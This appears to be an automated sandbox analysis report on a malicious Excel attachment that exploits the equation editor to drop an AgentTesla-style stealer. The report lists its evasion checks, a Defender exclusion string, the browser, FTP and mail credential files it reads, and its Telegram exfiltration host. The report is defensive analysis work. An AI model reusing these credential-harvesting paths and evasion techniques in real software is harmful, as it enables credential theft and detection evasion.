                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0045D758
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00680108
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_006831D0
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00684260
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00687648
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0068CA28
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0068AAB0
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00AC0048
                  Source: New Order for April#89032.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: hkn[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: hkn[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$New Order for April#89032.xlsxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR157.tmpJump to behavior
                  Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: New Order for April#89032.xlsxReversingLabs: Detection: 31%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: New Order for April#89032.xlsxStatic file information: File size 2269696 > 1048576
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: New Order for April#89032.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: New Order for April#89032.xlsxInitial sample: OLE indicators encrypted = True
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DC858F push dword ptr [esi+3Fh]; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DC92FB push FFFFFFD9h; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00536E00 pushad ; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00DC858F push dword ptr [esi+3Fh]; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00DC92FB push FFFFFFD9h; iretd
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.54549317516
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Drops PE files to the user root directoryShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: New Order for April#89032.xlsxStream path 'EncryptedPackage' entropy: 7.9999090543 (max. 8.0)

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM3Show sources
                  Source: Yara matchFile source: 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9672
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2556Thread sleep time: -300000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2724Thread sleep time: -103949s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1684Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2688Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2960Thread sleep time: -480000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1900Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1900Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1336Thread sleep count: 9672 > 30
                  Source: C:\Users\Public\vbc.exe TID: 1336Thread sleep count: 65 > 30
                  Source: C:\Users\Public\vbc.exe TID: 1900Thread sleep count: 102 > 30
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 103949
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: New Order for April#89032.xlsxBinary or memory string: u<qEmu
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: VMWARE
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                  Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                  Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                  Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmpBinary or memory string: !Progman
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
                  Source: Yara matchFile source: 4.2.vbc.exe.3446ec0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.vbc.exe.3446ec0.3.raw.unpack, type: UNPACKEDPE
                  Yara detected Telegram RATShow sources
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
                  Source: Yara matchFile source: 4.2.vbc.exe.3446ec0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.vbc.exe.3446ec0.3.raw.unpack, type: UNPACKEDPE
                  Yara detected Telegram RATShow sources
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation211Path InterceptionExtra Window Memory Injection1Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information31Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing2Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Extra Window Memory Injection1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 383941 Sample: New Order for April#89032.xlsx Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Antivirus detection for URL or domain 2->33 35 Multi AV Scanner detection for dropped file 2->35 37 12 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 38 34 2->12         started        process3 dnsIp4 29 198.23.174.104, 49167, 80 AS-COLOCROSSINGUS United States 7->29 21 C:\Users\user\AppData\Local\...\hkn[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        25 C:\Users\...\~$New Order for April#89032.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Multi AV Scanner detection for dropped file 14->49 51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->51 53 Machine Learning detection for dropped file 14->53 55 2 other signatures 14->55 17 vbc.exe 12 2 14->17         started        process9 dnsIp10 27 api.telegram.org 149.154.167.220, 443, 49168 TELEGRAMRU United Kingdom 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

